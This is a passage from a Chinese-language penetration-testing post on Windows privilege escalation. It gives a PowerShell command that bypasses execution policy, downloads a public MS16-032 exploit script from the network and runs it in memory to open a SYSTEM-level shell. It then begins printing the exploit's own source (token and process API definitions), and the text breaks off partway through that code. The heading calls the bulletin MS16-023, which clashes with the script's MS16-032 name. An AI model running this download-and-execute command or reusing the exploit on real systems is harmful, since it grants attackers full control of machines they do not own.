MS16-023提权 + 信息收集 + 静默WinPcap安装 + WinDump抓包

0x01 MS16-023提权

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c start cmd /k echo Hello, World!'"

从远程下载执行一个PowerShell脚本，并新开一个System权限的窗口。

(虚拟机调成2个CPU及以上，才能运行成功）

 

也可以自己修改PowerShell脚本，在最前两行修改命令。

powershell -nop -ep bypass -File MS16-023.ps1

#=================修改此处命令==================#

$Application = "cmd.exe"

$Commandline = "/c start cmd /k echo Hello, World!"

#===============================================#

    Add-Type -TypeDefinition @"

    using System;

    using System.Diagnostics;

    using System.Runtime.InteropServices;

    using System.Security.Principal;

 

    [StructLayout(LayoutKind.Sequential)]

    public struct PROCESS_INFORMATION

    {

        public IntPtr hProcess;

        public IntPtr hThread;

        public int dwProcessId;

        public int dwThreadId;

    }

 

    [StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)]

    public struct STARTUPINFO

    {

        public Int32 cb;

        public string lpReserved;

        public string lpDesktop;

        public string lpTitle;

        public Int32 dwX;

        public Int32 dwY;

        public Int32 dwXSize;

        public Int32 dwYSize;

        public Int32 dwXCountChars;

        public Int32 dwYCountChars;

        public Int32 dwFillAttribute;

        public Int32 dwFlags;

        public Int16 wShowWindow;

        public Int16 cbReserved2;

        public IntPtr lpReserved2;

        public IntPtr hStdInput;

        public IntPtr hStdOutput;

        public IntPtr hStdError;

    }

 

    [StructLayout(LayoutKind.Sequential)]

    public struct SQOS

    {

        public int Length;

        public int ImpersonationLevel;

        public int ContextTrackingMode;

        public bool EffectiveOnly;

    }

 

    public static class Advapi32

    {

        [DllImport("advapi32.dll", SetLastError=true, CharSet=CharSet.Unicode)]

        public static extern bool CreateProcessWithLogonW(

            String userName,

            String domain,

            String password,

            int logonFlags,

            String applicationName,

            String commandLine,

            int creationFlags,

            int environment,

            String currentDirectory,

            ref  STARTUPINFO startupInfo,

            out PROCESS_INFORMATION processInformation);

 

        [DllImport("advapi32.dll", SetLastError=true)]

        public static extern bool SetThreadToken(

            ref IntPtr Thread,

            IntPtr Token);

 

        [DllImport("advapi32.dll", SetLastError=true)]

        public static extern bool OpenThreadToken(

            IntPtr ThreadHandle,

            int DesiredAccess,

            bool OpenAsSelf,

            out IntPtr TokenHandle);

 

        [DllImport("advapi32.dll", SetLastError=true)]

        public static extern bool OpenProcessToken(

            IntPtr ProcessHandle,

            int DesiredAccess,

            ref IntPtr TokenHandle);

 

        [DllImport("advapi32.dll", SetLastError=true)]

        public extern static bool DuplicateToken(

            IntPtr ExistingTokenHandle,

            int SECURITY_IMPERSONATION_LEVEL,

            ref IntPtr DuplicateTokenHandle);

    }

 

    public static class Kernel32

    {

        [DllImport("kernel32.dll")]

        public static extern uint GetLastError();